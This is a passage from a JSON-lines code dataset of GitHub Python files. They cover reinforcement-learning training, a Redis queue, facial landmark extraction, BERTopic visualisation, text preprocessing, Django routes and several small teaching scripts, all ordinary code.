replay buffer :\n action_shape = (\n 1 if env.single_action_space.shape == () else env.single_action_space.shape\n )\n dummy_step = (\n jnp.zeros(env.single_observation_space.shape), # obs_{t-1}\n jnp.zeros(action_shape), # action_{t-1}\n jnp.zeros(1), # reward_t\n jnp.zeros(env.single_observation_space.shape), # obs_t\n jnp.zeros(1), # terminated_t\n )\n replaybuffer = ReplayBuffer(\n max_replay_size=max_replay_size,\n dummy_data_sample=dummy_step,\n sample_batch_size=batch_size,\n )\n buffer_state = replaybuffer.init(next(rng))\n\n uniform_action = get_uniform_action_sample_fct(\n env.single_action_space, env.action_space\n )\n replaybuffer.sample = jax.jit(replaybuffer.sample)\n replaybuffer.insert = jax.jit(replaybuffer.insert)\n replaybuffer.vmap_sample = jax.jit(\n jax.vmap(replaybuffer.sample_with_key, in_axes=(None, 0))\n )\n\n ################ TRAIN ################\n\n n_step_done = 0\n obs = jnp.array(first_obs)\n while n_step_done <= total_train_step:\n # with jax.profiler.trace(\n # \"/tmp/jax-trace\",\n # create_perfetto_link=n_step_done > start_training_after_x_steps,\n # ):\n with Timer(name=\"action_selection\", logger=None):\n if n_step_done < start_training_after_x_steps:\n actions = uniform_action(next(rng))\n actor_output = {\"actions\": actions}\n else:\n agent_state, actor_output = agent.actor_step(\n agent_state=agent_state,\n obs=obs,\n key=next(rng),\n evaluation=False,\n )\n actions = actor_output.actions\n actor_output = actor_output._asdict()\n assert jnp.logical_and(-1 <= actions, actions <= 1).all()\n actions.block_until_ready()\n event.trigger(\n \"on_action_selection\",\n step=n_step_done,\n **actor_output,\n )\n with Timer(\"env_step\", logger=None):\n env_output = env.step(actions)\n env_output[0].block_until_ready()\n\n with Timer(\"replaybuffer_insert\", logger=None):\n new_obs, reward, terminated, truncated, info = env_output\n step_data = (obs, actions, reward, new_obs, terminated)\n buffer_state = replaybuffer.insert(buffer_state, step_data)\n buffer_state.data.block_until_ready()\n\n if (\n n_step_done > start_training_after_x_steps\n and replaybuffer.size(buffer_state) > batch_size\n ):\n with Timer(\"learn_step\", logger=None):\n if cfg[\"train\"].get(\"with_scan\", False):\n keys = jax.random.split(next(rng), grad_steps_per_step * num_envs)\n buffer_sample = replaybuffer.vmap_sample(buffer_state, keys)\n agent_state, learner_output = agent.learn_n_step(\n agent_state, buffer_sample, next(rng)\n )\n else:\n for _ in range(grad_steps_per_step * num_envs):\n buffer_state, buffer_sample = replaybuffer.sample(buffer_state)\n agent_state, learner_output = agent.learner_step(\n agent_state, buffer_sample, next(rng)\n )\n learner_output[0].block_until_ready()\n\n event.trigger(\"on_learn_step\", step=n_step_done, **learner_output._asdict())\n\n if n_step_done % eval_every == 0:\n with Timer(\"evaluation\", logger=None):\n crewards = eval_rollouts(eval_env, agent, agent_state, rng)\n crewards.block_until_ready()\n event.trigger(\n \"on_evaluation\",\n step=n_step_done,\n crewards=crewards,\n eval_every=eval_every,\n )\n obs = new_obs\n n_step_done += env.num_envs\n\n total = sum(Timer.timers.total(name) for name in Timer.timers.data)\n print(\"total timers : \", total)\n\n\nif __name__ == \"__main__\":\n from jax.config import config\n\n os.environ[\"XLA_PYTHON_CLIENT_PREALLOCATE\"] = \"false\"\n # config.update(\"jax_debug_nans\", True)\n # to remove once package created :\n sys.path.append(os.getcwd())\n\n train()\n","repo_name":"olivier-serris/ModularRollouts-Examples","sub_path":"rlax_tests/train_off_pol.py","file_name":"train_off_pol.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30621243036","text":"import logging\nfrom functools import wraps\n\nimport redis\nfrom redis.exceptions import ConnectionError\n\nfrom .exceptions import QueueConnectionError\n\nLOG = logging.getLogger(__name__)\n\n\ndef convert_conn_error(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except ConnectionError:\n raise QueueConnectionError(\"Connection failed to redis\")\n return wrapper\n\n\nclass RedisQueue(object):\n \"\"\"Simple Queue with Redis Backend\n\n Borrowed from\n http://peter-hoffmann.com/2012/python-simple-queue-redis-queue.html\n (if found, please return)\n\n \"\"\"\n def __init__(self, name, namespace='taskd', conn=None, **redis_kwargs):\n \"\"\"The default connection parameters are:\n host='localhost', port=6379, db=0\n\n \"\"\"\n if conn:\n self.__db = conn\n else:\n self.__db = redis.StrictRedis(**redis_kwargs)\n self.key = '%s:%s' % (namespace, name)\n\n @convert_conn_error\n def qsize(self):\n \"\"\"Return the approximate size of the queue.\"\"\"\n return self.__db.llen(self.key)\n\n @convert_conn_error\n def empty(self):\n \"\"\"Return True if the queue is empty, False otherwise.\"\"\"\n return self.qsize() == 0\n\n @convert_conn_error\n def put(self, item):\n \"\"\"Put item into the queue.\"\"\"\n self.__db.rpush(self.key, item)\n\n @convert_conn_error\n def get(self, block=True, timeout=None):\n \"\"\"Remove and return an item from the queue.\n\n If optional args block is true and timeout is None (the default), block\n if necessary until an item is available.\n\n \"\"\"\n if block:\n item = self.__db.blpop(self.key, timeout=timeout)\n if item:\n item = item[1]\n else:\n item = self.__db.lpop(self.key)\n\n return item\n\n @convert_conn_error\n def get_nowait(self):\n return self.get(block=False)\n\n @convert_conn_error\n def clear(self):\n self.__db.delete(self.key)\n","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"vulcanforge/taskd/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"71171699442","text":"# import the necessary packages\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport dlib\nimport cv2\nimport os\nfrom PIL import Image, ImageDraw\nfrom random import randint\nimport json\n\nIMG_WIDTH = 328\nIMG_HEIGHT = 406\n\ndef detect_face_parts(image):\n # construct the argument parser and parse the arguments\n '''ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n \thelp=\"path to facial landmark predictor\")\n ap.add_argument(\"-i\", \"--image\", required=True,\n \thelp=\"path to input image\")\n args = vars(ap.parse_args())\n '''\n\n parts = {}\n # initialize dlib's face detector (HOG-based) and then create\n # the facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n # load the input image, resize it, and convert it to grayscale\n #image = cv2.imread(pil_image)\n #image = np.array(pil_image)\n # Convert RGB to BGR\n #open_cv_image = open_cv_image[:, :, ::-1].copy()\n #image = imutils.resize(image, width=500)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n \t# determine the facial landmarks for the face region, then\n \t# convert the landmark (x, y)-coordinates to a NumPy array\n \tshape = predictor(gray, rect)\n \tshape = face_utils.shape_to_np(shape)\n \t# loop over the face parts individually\n \tfor (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():\n pos = cv2.boundingRect(np.array([shape[i:j]]))\n parts[name] = {\n 'shape': [[int(p[0]), int(p[1])] for p in shape[i:j]],\n 'rect': (pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3])\n }\n\n \t\t# clone the original image so we can draw on it, then\n \t\t# display the name of the face part on the image\n \t\t#clone = image.copy()\n \t\t#cv2.putText(clone, name, (10, 30), cv2.FONT_HERSHEY_SIMPLEX,\n \t\t#\t0.7, (0, 0, 255), 2)\n \t\t# loop over the subset of facial landmarks, drawing the\n \t\t# specific face part\n \t\t#for (x, y) in shape[i:j]:\n \t\t#\tcv2.circle(clone, (x, y), 1, (0, 0, 255), -1)\n\n\n # extract the ROI of the face region as a separate image\n '''\n \t\t(x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n \t\troi = image[y:y + h, x:x + w]\n \t\troi = imutils.resize(roi, width=250, inter=cv2.INTER_CUBIC)\n \t\t# show the particular face part\n \t\tcv2.imshow(\"ROI\", roi)\n \t\tcv2.imshow(\"Image\", clone)\n \t\tcv2.waitKey(0)\n '''\n\n \t# visualize all facial landmarks with a transparent overlay\n\n \t#output = face_utils.visualize_facial_landmarks(image, shape)\n \t#cv2.imshow(\"Image\", output)\n \t#cv2.waitKey(0)\n\n return parts\n\ndef convert_parts_to_slices(parts, w):\n slices = {}\n try:\n if parts['left_eye'][1] < parts['right_eye'][1]:\n y1a = parts['left_eye'][1]\n else:\n y1a = parts['right_eye'][1]\n if parts['left_eye'][3] > parts['right_eye'][3]:\n y2a = parts['left_eye'][3]\n else:\n y2a = parts['right_eye'][3]\n except:\n y1a = w * 2\n y2a = 0\n\n try:\n if parts['left_eyebrow'][1] < parts['right_eyebrow'][1]:\n y1b = parts['left_eyebrow'][1]\n else:\n y1b = parts['right_eyebrow'][1]\n if parts['left_eyebrow'][3] > parts['right_eyebrow'][3]:\n y2b = parts['left_eyebrow'][3]\n else:\n y2b = parts['right_eyebrow'][3]\n #slices['eye_brow'] = (0, y1, w, y2)\n except:\n y1b = w * 2\n y2b = 0\n\n if not(y2a == 0 and y2b == 0):\n if y1a > y1b:\n y1a = y1b\n if y2b > y2a:\n y2a = y2b\n slices['eye'] = (0, y1a, w, y2a)\n\n try:\n slices['mouth'] = (0, parts['mouth'][1], w, parts['mouth'][3])\n except:\n pass\n #slices['nose'] = (0, parts['nose'][1], w, parts['nose'][3])\n try:\n slices['nose'] = parts['nose']\n except:\n pass\n\n return slices\n\ndef load_image(img_file):\n print (\"Loading: \", os.path.basename(img_file))\n img = Image.open(img_file)\n \"\"\"\n w = int(IMG_HEIGHT / img.size[1] * img.size[0])\n img = img.resize((w, IMG_HEIGHT), Image.ANTIALIAS)\n #img.thumbnail((w, IMG_HEIGHT), Image.ANTIALIAS)\n if w > IMG_WIDTH:\n # neeed to crop the sides of the image, centering it (height is alread correct)\n border = (w - IMG_WIDTH) / 2\n area = (border, 0, w - border, IMG_HEIGHT)\n img = img.crop(area)\n \"\"\"\n img = img.convert('RGB')\n img = np.array(img)\n img = img[:, :, ::-1].copy()\n\n parts = detect_face_parts(img)\n #slices = convert_parts_to_slices(parts, img.size[1])\n\n result = {\n #'name': os.path.basename(img_file),\n #'img': img,\n 'parts': parts\n #'slices':slices\n }\n\n return result\n\n#b = load_image(r\"D:\\git_hub\\aporto\\python.git\\face_mixer_photos_pcg\\pics\\mediciner.png\")\n#d = load_image(r\"D:\\git_hub\\aporto\\python.git\\face_mixer_photos_pcg\\pics\\daniel.png\")\n\ndef main():\n path = os.path.dirname(__file__)\n pics_path = os.path.join(path, \"pics\")\n files = [os.path.join(pics_path, f) for f in os.listdir(pics_path)]\n files = [f for f in files if os.path.splitext(f)[1].upper() != \".DB\"]\n\n imgs = {}\n for f in files:\n img = load_image(f)\n if len(img['parts']) > 0:\n imgs[os.path.basename(f)] = img\n\n with open (\"image_data.json\", \"w\") as f:\n s = json.dumps(imgs, indent=4, sort_keys=True)\n f.write(s)\n\nmain()","repo_name":"aporto/python","sub_path":"face_mixer_photos_pcg_v2/extract_image_data.py","file_name":"extract_image_data.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17609538107","text":"from random import *\nimport time\n\nnumeros = []\n\nfor v in range(1, 10000000):\n numeros.append(randint(1, 10000000))\n\nnumeros.sort()\nprint(numeros[950000])\n\n\nnum = int(input(\"Digite o número:\"))\ntempo_inicial = int(round(time.time() * 1000))\n\nfor v in numeros:\n if v == num:\n print(\"Existe:\", num)\n break\n\ntempo = (int(round(time.time() * 1000)) - tempo_inicial)\nprint(\"Tempo\", tempo)\n\n\n\n\n\n\n\n","repo_name":"mickaelsouzadev/TAP","sub_path":"Aula_8_Exception_Recursion/2_Recursividade/4_Busca.py","file_name":"4_Busca.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"42335447905","text":"__author__ = 'GCassani'\n\nimport helpers as help\nfrom collections import defaultdict\n\n\ndef map_affix_to_idx(affix_file):\n\n \"\"\"\n :param affix_file: the path to the file containing the ordered list of affixes\n :return ids2affixes: a dictionary mapping numerical indices to affixes\n \"\"\"\n\n ids2affixes = {}\n with open(affix_file, \"r\") as f:\n for idx, line in enumerate(f):\n if line.strip().isupper():\n ids2affixes[idx] = line.strip()\n\n return ids2affixes\n\n\n########################################################################################################################\n\n\ndef map_nonwords_to_affix(correlation_file, ids2affixes):\n\n \"\"\"\n :param correlation_file: the path to the file storing correlations for each nonword\n :param ids2affixes: a dictionary mapping row indices to affixes\n :return nonwords2affixes: a dictionary mapping each nonword to all anchors and the corresponding pairwise\n correlation between the nonword and anchor semantic vector\n \"\"\"\n\n ids2nonwords = help.map_indices_to_test_words(correlation_file)\n\n nonwords2affixes = defaultdict(dict)\n with open(correlation_file, \"r\") as f:\n for row_id, line in enumerate(f):\n words = line.strip().split('\\t')\n for col_id, corr in enumerate(words):\n if not corr in ids2nonwords.values():\n nonwords2affixes[ids2nonwords[col_id]][ids2affixes[row_id]] = float(corr)\n\n return nonwords2affixes\n\n\n########################################################################################################################\n\n\ndef write_correlations(nonwords2affixes, ids2affixes, output_file, table_format=\"long\", cond=\"minimalist\"):\n\n \"\"\"\n :param nonwords2affixes: a dictionary mapping each nonword to all anchors and the corresponding pairwise\n correlation between the nonword and anchor semantic vector\n :param ids2affixes: a dictionary mapping numerical indices to affixes\n :param output_file: the path to the file where the output is going to be written to\n :param cond: a string indicating the input used for the experiment\n :param table_format: a string indicating how to print data to table, either 'long' or 'wide'. In the long\n format, five columns are created, first the nonword, then the condition, then the\n affix, then the correlation. In the wide format, each affix is a different column,\n with each nonword-affix cell indicates the correlation between the semantic vector for\n the nonword and the semantic vector for the affix. An extra column indicates the\n condition.\n \"\"\"\n\n inflections = sorted(set(ids2affixes.values()))\n\n with open(output_file, \"w\") as f:\n\n if table_format == 'long':\n f.write('\\t'.join([\"Nonword\", \"Target\", \"Condition\", \"Affix\", \"Correlation\"]))\n f.write('\\n')\n for nonword in nonwords2affixes:\n baseform, tag = nonword.split(\"|\")\n for affix in inflections:\n corr = str(nonwords2affixes[nonword][affix])\n f.write('\\t'.join([baseform, tag, cond, affix, corr]))\n f.write('\\n')\n\n elif table_format == 'wide':\n f.write('\\t'.join([\"Nonword\", \"Target\", \"Condition\", \"\\t\".join(inflections)]))\n f.write('\\n')\n for nonword in nonwords2affixes:\n baseform, tag = nonword.split(\"|\")\n correlations = []\n for affix in inflections:\n correlations.append(str(nonwords2affixes[nonword][affix]))\n f.write('\\t'.join([baseform, tag, cond, '\\t'.join(correlations)]))\n f.write('\\n')\n\n else:\n raise ValueError(\"unrecognized format %s!\" % table_format)\n\n\n########################################################################################################################\n\n\ndef affix_analysis(affix_file, correlations_file, output_file, table_format=\"long\", cond=\"minimalist\"):\n\n \"\"\"\n :param affix_file: the path to the file containing the ordered list of affixes\n :param correlations_file: the path containing the correlations between each nonword and all affixes\n :param output_file: the path to the file where the output is going to be written to\n :param cond: a string indicating the input used for the experiment\n :param table_format: a string indicating how to print data to table, either 'long' or 'wide'. In the long\n format, five columns are created, first the nonword, then the condition, then the\n affix, then the correlation. In the wide format, each affix is a different column,\n with each nonword-affix cell indicateing the correlation between the semantic vector\n for the nonword and the semantic vector for the affix. An extra column indicates the\n condition.\n \"\"\"\n\n ids2affixes = map_affix_to_idx(affix_file)\n nonwords2affixes = map_nonwords_to_affix(correlations_file, ids2affixes)\n write_correlations(nonwords2affixes, ids2affixes, output_file, table_format=table_format, cond=cond)\n","repo_name":"GiovanniCassani/discriminative_learning","sub_path":"nonwords/affixes.py","file_name":"affixes.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16694755194","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom dotenv import find_dotenv, load_dotenv\nfrom pathlib import Path\nimport pandas as pd\nimport pickle\nfrom bertopic import BERTopic\nimport numpy as np\n\n\ndef generate_visualisations(name, docs, titles, classes, in_path, out_path, embeddings):\n '''\n Visualise the given fitted BERTopic model\n Uses Uniform Manifold Approximation Projection (UMAP) to represent the embedding-space\n All visualisations are saved to file\n '''\n # load BERTopic model\n model_path = project_dir.joinpath(in_path)\n model = BERTopic.load(model_path)\n\n # transform training data by fitted BERTopic model\n topics, probs = model.transform(docs, embeddings)\n\n # get hierachical representation of topics (for hierarchical visualisation)\n hierarchical_topics = model.hierarchical_topics(docs)\n\n # get topics per SchoolCode (for stratified visualisation)\n topics_per_class = model.topics_per_class(docs, classes = classes)\n\n # set output directory for visualisations\n output = project_dir.joinpath(out_path)\n\n # get number of generated topics (excluding the outlier topic)\n num_topics = len(np.unique(topics)) - 1\n \n\n # VISUALISATION: 2D representation of topics\n output_topics = output.joinpath(f'visualise_topics_{name}.html')\n model.visualize_topics(title = f'Intertopic Distance Map {name}').write_html(output_topics)\n\n # VISUALISATION: 2D representation of documents\n output_documents = output.joinpath(f'visualise_documents_{name}.html')\n model.visualize_documents(titles.to_numpy(),\n embeddings = embeddings,\n title = f'Documents and Topics {name}').write_html(output_documents)\n\n # VISUALISATION: 2D representation of documents (NO LABELS)\n output_documents = output.joinpath(f'visualise_documents_{name}_NOLABEL.html')\n model.visualize_documents(titles.to_numpy(),\n embeddings = embeddings,\n title = f'Documents and Topics {name} NOLABEL',\n hide_annotations = True).write_html(output_documents)\n\n # VISUALISATION: hierarchical structure of topics\n output_hierarchy = output.joinpath(f'visualise_hierarchical_topics_{name}.html')\n model.visualize_hierarchy(hierarchical_topics = hierarchical_topics,\n title = f'Hierarchical Clustering {name}').write_html(output_hierarchy)\n\n # VISUALISATION: hierarchical structure of documents\n # skip this visualisation for Longformer-BERTopic (broken)\n # possibly broken for Longformer-BERTopic due to the low number of topics found\n if not name == 'longformer_bertopic':\n output_hierarchy_documents = output.joinpath(f'visualise_hierarchical_documents_{name}.html')\n model.visualize_hierarchical_documents(titles.to_numpy(), \n hierarchical_topics, \n embeddings = embeddings,\n hide_document_hover = False,\n title = f'Hierarchical Documents and Topics {name}').write_html(output_hierarchy_documents)\n\n # VISUALISATION: terms representative of topics, per topic\n output_representative_terms = output.joinpath(f'visualise_representative_terms_{name}.html')\n model.visualize_barchart(top_n_topics = num_topics,\n title = f'Topic Word Scores {name}').write_html(output_representative_terms)\n\n # VISUALISATION: topic similarity matrix\n # generate multiple matrices, each with i = 1, 2, ..., 10 similarity clusters\n for i in range(1, min(num_topics, 11)):\n output_similarity_matrix = output.joinpath(f'visualise_similarity_matrix_{i}_clusters_{name}.html')\n model.visualize_heatmap(top_n_topics = num_topics,\n n_clusters = i,\n title = f'Similarity Matrix {i} clusters {name}').write_html(output_similarity_matrix)\n\n # VISUALISATION: term score decline; the importance of terms, per topic\n output_term_score = output.joinpath(f'visualise_term_score_{name}.html')\n model.visualize_term_rank(title = f'Term score decline per Topic {name}').write_html(output_term_score)\n\n # VISUALISATION: topics per university school (SchoolCode)\n output_topics_per_school = output.joinpath(f'visualise_topics_per_school_{name}.html')\n model.visualize_topics_per_class(topics_per_class, \n top_n_topics = num_topics,\n title = f'Topics per Class {name}').write_html(output_topics_per_school)\n\n\ndef main():\n '''\n Graphical visualisation of the FULLDATA_BigBird-CT-BERTopic topic model\n visualisations saved to ../reports/figures/\n '''\n logger = logging.getLogger(__name__)\n logger.info('visualising FULLDATA_BigBird-CT_BERTopic topic model output')\n\n # load train.pkl\n train_path = project_dir.joinpath('data/processed/train.pkl')\n train = pd.read_pickle(train_path)\n \n # load test_unlabelled.pkl\n test_path = project_dir.joinpath('data/interim/test_unlabelled.pkl')\n test = pd.read_pickle(test_path)\n\n # concatenate train and test data\n fulldata = pd.concat([train, test])\n fulldata_list = fulldata['Concatenated'].tolist()\n\n # get documents, ModuleCodes and SchoolCodes\n docs = fulldata['Concatenated']\n titles = fulldata['ModuleCode'].apply(str) # modulecodes now strings instead of lists\n classes = fulldata['SchoolCode']\n\n # load full dataset BigBird-CT document embeddings\n fulldata_bigbird_ct_embeddings_output = project_dir.joinpath('data/processed/fulldata_bigbird_ct_document_embeddings.pkl')\n with open(fulldata_bigbird_ct_embeddings_output, \"rb\") as embeddings_input:\n saved_embeddings = pickle.load(embeddings_input)\n fulldata_bigbird_ct_embeddings = saved_embeddings['fulldata_bigbird_ct_embeddings']\n\n # generate visualisations\n # BigBird-CT-BERTopic\n generate_visualisations('FULLDATA_bigbird_ct_bertopic',\n docs,\n titles,\n classes,\n 'models/FULLDATA_bigbird-ct-bertopic',\n 'reports/figures/fulldata_bigbird_ct_bertopic',\n fulldata_bigbird_ct_embeddings)\n \n logger.info('finished visualising topic modelling output, '\n 'output saved to ../reports/figures/fulldata_bigbird_ct_bertopic')\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # resolve project directory\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env by walking up directories until it's found, then load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()","repo_name":"lukekaye/sts-university-modules","sub_path":"src/visualization/visualise_fulldata_bigbird_ct_bertopic.py","file_name":"visualise_fulldata_bigbird_ct_bertopic.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3927324013","text":"## sys01_cralwer.py\n##\n## python sys01_crawler.py -u http://www.naver.com\nimport sys\nimport requests\n\nargs = sys.argv[1:]\nprint(args)\n\nif (args[0]=='-h'):\n\tr = requests.get(args[1])\n\tr.status_code\t\n\tprint(r.status_code)\n## 실습하면 5시 15분까지 휴식하겠습니다. \n## 실습하면서 쉬고, 이것을 클래스 구조로 변경 \n\n## \n\n\n\n\t###print(\"인터넷 연결이 안되요.!!!\")\n","repo_name":"kang9693/pybasic5","sub_path":"sys01_crawler.py","file_name":"sys01_crawler.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38084736804","text":"import os\nimport sys\nimport numpy as np\n\nimport h5py\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))\n\nimport flares_1.analysis.plt as fplt\n\n\n\nDataFolder = f'/Users/stephenwilkins/research/simulations/FLARES/data/'\n\ndata = h5py.File(f'{DataFolder}/flares_noparticles.hdf5', 'r')\n\n\nsnaps = {'010_z005p000': 5.0, '009_z006p000': 6.0, '008_z007p000': 7.0, '007_z008p000': 8.0, '006_z009p000': 9.0, '005_z010p000': 10.0}\n\nsnap = '010_z005p000'\n\nxlims = [8, 11.5]\nylims = [-1.5, 2.]\n\n\n# --- coloured by simulation\n\nby_sim = False\nif by_sim:\n fig, ax = fplt.single()\n for sim in data.keys():\n\n sfr = data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']\n mstar = data[f'{sim}/{snap}/Galaxy']['Mstar_30']\n\n ax.scatter(np.log10(mstar), np.log10(sfr)-np.log10(mstar), label = sim, s=5, alpha = 0.25)\n\n # ax.set_ylim([27, 32])\n # ax.set_xlim([7, 12])\n\n ax.set_ylabel(r'$\\log_{10}({\\rm SFR}/{\\rm yr^{-1})}$')\n ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n ax.grid(True)\n ax.legend(fontsize=6)\n fig.savefig('figs/mass_sfr-sims.pdf')\n\n\n\n# --- all simulations (un-weighted)\n\nall = True\nif all:\n fig, ax = fplt.single()\n\n sfr = np.array([])\n mstar = np.array([])\n\n for sim in data.keys():\n sfr = np.hstack((sfr, data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']))\n mstar = np.hstack((mstar, data[f'{sim}/{snap}/Galaxy']['Mstar_30']))\n\n\n sfr[sfr<=0] = 1E-10\n sfr = np.log10(sfr)\n mstar = np.log10(mstar)\n\n ssfr = sfr-mstar-1+9\n\n # ax.scatter(np.log10(mstar), np.log10(sfr), s=1, alpha = 0.25, c='k', zorder = 1)\n ax.hexbin(mstar, ssfr, gridsize = (25,25), bins = 'log', cmap='Greys', linewidths=0., mincnt = 1, extent = [*xlims, *ylims], alpha = 0.5, zorder = 2)\n\n bins = np.arange(*xlims, 0.2)\n P16, P50, P84 = fplt.average_line(mstar, ssfr,bins)\n\n ax.fill_between(bins,P84,P16,color='k', alpha=0.15)\n ax.plot(bins,P50,ls='-',c='k', alpha=1.0, lw=1)\n\n ax.text(0.8, 0.9, f'$z={snaps[snap]}$', transform=ax.transAxes)\n\n ax.set_ylim(ylims)\n ax.set_xlim(xlims)\n ax.set_ylabel(r'$\\log_{10}({\\rm sSFR}/{\\rm Gyr^{-1})}$')\n ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n ax.grid(True)\n fig.savefig('figs/mass_sfr-all.pdf')\n\n\n\n# --- all simulations (un-weighted)\n\nredshift_evolution = True\nif redshift_evolution:\n\n fig, ax = fplt.single()\n\n for snap, z in snaps.items():\n\n print('-'*5, snap)\n\n sfr = np.array([])\n mstar = np.array([])\n\n for sim in data.keys():\n sfr = np.hstack((sfr, data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']))\n mstar = np.hstack((mstar, data[f'{sim}/{snap}/Galaxy']['Mstar_30']))\n\n sfr[sfr<=0] = 1E-10\n sfr = np.log10(sfr)\n mstar = np.log10(mstar)\n ssfr = sfr-mstar-1+9\n\n print(f'N: {sfr.shape[0]}')\n print(f'max SFR: {np.max(sfr):.2f}')\n print(f'max M*: {np.max(mstar):.2f}')\n\n bins = np.arange(*xlims, 0.2)\n P16, P50, P84 = fplt.average_line(mstar, ssfr,bins)\n\n ax.fill_between(bins,P84,P16, color=fplt.c_z(z), alpha=0.1)\n ax.plot(bins,P50,ls='-', color=fplt.c_z(z), alpha=1.0, lw=1, label = f'$z={z}$')\n\n\n\n ax.set_ylim(ylims)\n ax.set_xlim(xlims)\n ax.set_ylabel(r'$\\log_{10}({\\rm sSFR}/{\\rm Gyr^{-1})}$')\n ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n ax.legend()\n ax.grid(True)\n fig.savefig('figs/mass_sfr-z.pdf')\n","repo_name":"stephenmwilkins/flares_1","sub_path":"examples/mass_sfr.py","file_name":"mass_sfr.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27217026439","text":"from django.conf.urls import patterns, url\n\nfrom Tasker import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^add$', views.add, name='add'),\n url(r'^complete/(?P\\w+)$', views.complete, name='complete'),\n url(r'^edit/(?P\\w+)$', views.edit, name='edit'),\n)\n","repo_name":"EricCline/Tasker","sub_path":"Tasker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70700563441","text":"class Person:\n def __init__(self, name, age,address):\n self.nama = name\n self.umur = age\n self.alamat = address\n\n def myfunc(self):\n print(\"Hello nama saya adalah \" + self.nama)\n # membuat object dari class person\n \np1 = Person(\"jhon\", 39,\"Jakarta\")\np1.myfunc()\n\nprint(\"Nama \",p1.nama)\nprint(\"Umur \",p1.umur)\nprint(\"Alamat \",p1.alamat)","repo_name":"pang53rut/ptyhon","sub_path":"Latihan python/OOP.py","file_name":"OOP.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42275388355","text":"import json\n\npath = 'data/daily_train.json'\nkey_path = 'keywords/keys.json'\n\nkeys = []\n\ndata = {}\nwith open(path) as fp :\n data =json.load(fp)\n\n#### get keywords \ntmp = {}\nwith open(key_path) as fp :\n tmp = json.load(fp)\n\nfor k in tmp['gender']['men'] :\n keys.append(k)\n\nfor k in tmp['gender']['women'] :\n keys.append(k)\n\ncount = 0\ndata_keys = {'dialog' : []}\n\nfor sens in data['dialog'] :\n # print(sens[0])\n \n for s in sens:\n tmp_list = s.lower()\n for k in keys :\n if k in tmp_list.split() :\n if [\" \".join([i for i in tmp_list.split()])] not in data_keys['dialog'] :\n data_keys['dialog'].append([\" \".join([i for i in tmp_list.split()])])\n\nprint(len(data_keys['dialog']))\n\nwith open('data/daily_train_key.json', 'w') as fp :\n json.dump(data_keys, fp)\n \n\n\n\n\n","repo_name":"ChengChengChu/nlp_project2","sub_path":"preprocess_get_keys.py","file_name":"preprocess_get_keys.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8505703934","text":"import common\nimport unittest\n\nclass TestHandlerCase(unittest.TestCase):\n\n def test_email_required(self):\n print(\"testing returns erver error message\")\n message = \"bad day\"\n result = common.return_server_error(message)\n print(result)\n self.assertEqual(result['statusCode'], 500)\n self.assertEqual(result['headers']['Content-Type'], 'application/json')\n self.assertIn(message, result['body'])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bolson9/funnyFuncs","sub_path":"tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40888744460","text":"__author__ = 'Gabor Szabo'\n\n\nimport sys, imp\n\n\ndef load_source(module_name, file_name, module_paths):\n \"\"\"Loads the given module from a Python source file.\n\n This function is called by PythonFunctionWrapper.prepare(...) after it\n started the Python interpreter to request the given source 